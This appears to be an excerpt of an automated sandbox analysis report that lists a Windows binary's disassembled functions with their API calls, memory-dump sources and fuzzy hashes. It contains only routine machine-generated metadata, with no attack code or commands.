                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ae0f5c8626348a5bccb8ded21f22f3a8b4eff9891050154809fd75e7a6107912
                                                                                                                                                                                                                                                                                                        • Instruction ID: 08c89c4b695563455b7bc1e6a999419cd833b665572cb8613cb83f77c3cd84fa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae0f5c8626348a5bccb8ded21f22f3a8b4eff9891050154809fd75e7a6107912
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42F0F976D046C037C2213677AC0EB5E326A9FC0771B25401CFA24A32C1FE2E89027360
                                                                                                                                                                                                                                                                                                        Function 01049480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB1F87
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: SelectObject.GDI32(?,00000000), ref: 00FB1F96
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: BeginPath.GDI32(?), ref: 00FB1FAD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: SelectObject.GDI32(?,00000000), ref: 00FB1FD6
                                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 010494AA
                                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,00000003,00000000), ref: 010494BE
                                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 010494CC
                                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,00000000,00000003), ref: 010494DC
                                                                                                                                                                                                                                                                                                        • EndPath.GDI32(?), ref: 010494EC
                                                                                                                                                                                                                                                                                                        • StrokePath.GDI32(?), ref: 010494FC
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1bdf1443cc030f9a1e681b653a78420ed2540208ae024599f1037d4160b6deea
                                                                                                                                                                                                                                                                                                        • Instruction ID: e9c1738f44b862bbdebca25ff5d3d7c6f1cd612ddb0a5a6f5cb1798a48af1426
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1bdf1443cc030f9a1e681b653a78420ed2540208ae024599f1037d4160b6deea
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26111EB600010DBFEF119F94DC88F9A7F6DEB083A4F008061BE9946165C7769D55DBA0
                                                                                                                                                                                                                                                                                                        Function 01015B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 01015B7C
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 01015B8D
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01015B94
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 01015B9C
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 01015BB3
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 01015BC5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 56513eed210d5a4bbbed56805926a51ba31f1c4e4a311e8429224da7c7b6668f
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7f9f985957fa9cab1cb5d4baa7c51136e371db0facd4c4ff13aba0908d2db860
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56513eed210d5a4bbbed56805926a51ba31f1c4e4a311e8429224da7c7b6668f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B0144B5A00319BBEB10AFE59D89F4E7FB8EB59751F004065FA45AB284D6759800CF90
                                                                                                                                                                                                                                                                                                        Function 00FB327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB32AF
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB32B7
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB32C2
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB32CD
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB32D5
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB32DD
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 435a624fd540feafebe460aa7acdce145525eab215413807240437ec9d2ed94a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 34f21c5dc34d188d5aed6811624e576473fddee925cd31b052c539ea5dd945a1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 435a624fd540feafebe460aa7acdce145525eab215413807240437ec9d2ed94a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A016CB09017597DE3008F5A8C85B52FFA8FF19354F00415B915C47941C7F5A864CBE5
                                                                                                                                                                                                                                                                                                        Function 0101F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0101F447
                                                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0101F45D
                                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0101F46C
                                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101F47B
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101F485
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101F48C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 357c7f1aebc1202061e1df4c8874833126ea6d9de869c31ae577eb77aed5ca4a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 888df7c57352979503fe938f85bbae72a78288d88eeca09d3f88adf4a10dbe35
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 357c7f1aebc1202061e1df4c8874833126ea6d9de869c31ae577eb77aed5ca4a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10F090B6241158BBE73157929D4EEEF3B7CEFDAB11F000058FA4191084D7A95A01C7B5
                                                                                                                                                                                                                                                                                                        Function 00FF34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?), ref: 00FF34EF
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00FF3506
                                                                                                                                                                                                                                                                                                        • GetWindowDC.USER32(?), ref: 00FF3512
                                                                                                                                                                                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00FF3521
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00FF3533
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000005), ref: 00FF354D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e43040ba7cda9106a3fe59a99f60108e18ae5944ac1b854505f75a37d673e06c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 23383754ee6c270d77acc3088cf2d5cc2cd95135b6ef934f032e14873cb31c35
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e43040ba7cda9106a3fe59a99f60108e18ae5944ac1b854505f75a37d673e06c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC018B75500109EFDB605FA4DD88BF97BB1FF58320F150120FA5AA21A0CB361E81AF10
                                                                                                                                                                                                                                                                                                        Function 010121C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010121CC
                                                                                                                                                                                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 010121D8
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 010121E1
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 010121E9
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 010121F2
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010121F9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 63d5713eff3b9a5e420ba35b20e025e6342bbefd0fa6983b45a9c5f44c1c36aa
                                                                                                                                                                                                                                                                                                        • Instruction ID: 522bff95260747ed6a7ee5e85f5483e671d00ebfad9ae23c888af823ffc0a4d3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63d5713eff3b9a5e420ba35b20e025e6342bbefd0fa6983b45a9c5f44c1c36aa
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFE01ABA104505BFDB211FE1EE4CD0ABF39FF69322B108220F66582078CB379420DB50
                                                                                                                                                                                                                                                                                                        Function 0101CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB41EA: _wcslen.LIBCMT ref: 00FB41EF
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0101CF99
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101CFE0
                                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0101D047
                                                                                                                                                                                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0101D075
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: cb3be30c96647391f0b7ecaf52a17594f4b9f2a69a988cff591beb41462e28f2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 21b07192827e7e71c1f78e969dad7a849b5b8f900dd13881b868128e01c4e7c7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb3be30c96647391f0b7ecaf52a17594f4b9f2a69a988cff591beb41462e28f2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E25105716043009BE762AEA8CD48B6F7BE8AF45394F040A6DFAD1D3295DB7CC905C752
                                                                                                                                                                                                                                                                                                        Function 0103B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 0103B903
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB41EA: _wcslen.LIBCMT ref: 00FB41EF
                                                                                                                                                                                                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 0103B998
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103B9C7
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: <$@
                                                                                                                                                                                                                                                                                                        • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                                        • Opcode ID: 99b12aa40c2e5f900d83f3ed0e57c7cef807023ebb2f1694fa61c5c046923004
                                                                                                                                                                                                                                                                                                        • Instruction ID: b1973dcac103578d707465e05128acf77b7c14b780b686f7213669c2cff1a609
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99b12aa40c2e5f900d83f3ed0e57c7cef807023ebb2f1694fa61c5c046923004
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C715874A00219DFCB10DF95C895A9EBBF5BF48314F048499E896AB352CB79ED41CF90
                                                                                                                                                                                                                                                                                                        Function 01017B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 01017B6D
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 01017BA3
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 01017BB4
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 01017C36
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                                        • Opcode ID: fc59a22d37340aeb5fb0c26464ad9092d16f070e8b84f72d15a5e262c3c7f1b4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 410bef98a584880fb3d7fba1ab38b60f3f3572acc1351200757415cac95cd447
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc59a22d37340aeb5fb0c26464ad9092d16f070e8b84f72d15a5e262c3c7f1b4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8841C0B1600208EFDB15DF64C884A9A7BB9EF54310F1080ADAD469F20AD7B9D940CBA0
                                                                                                                                                                                                                                                                                                        Function 01044818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010448D1
                                                                                                                                                                                                                                                                                                        • IsMenu.USER32(?), ref: 010448E6
                                                                                                                                                                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0104492E
                                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32 ref: 01044941
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: df5e5e2a336a3d0625b4fbc9795ae91f75145b895082bfe85e382d5d214a91fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 34556b03b19ab0aad7b4f3164e4525715d022ace08a4c6e31310495748c79cb0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df5e5e2a336a3d0625b4fbc9795ae91f75145b895082bfe85e382d5d214a91fc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3414AB9A00209EFEB20CF55D8C4AAEBBF9FF05364F044169E99597240C735ED45DBA0
                                                                                                                                                                                                                                                                                                        Function 0101272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
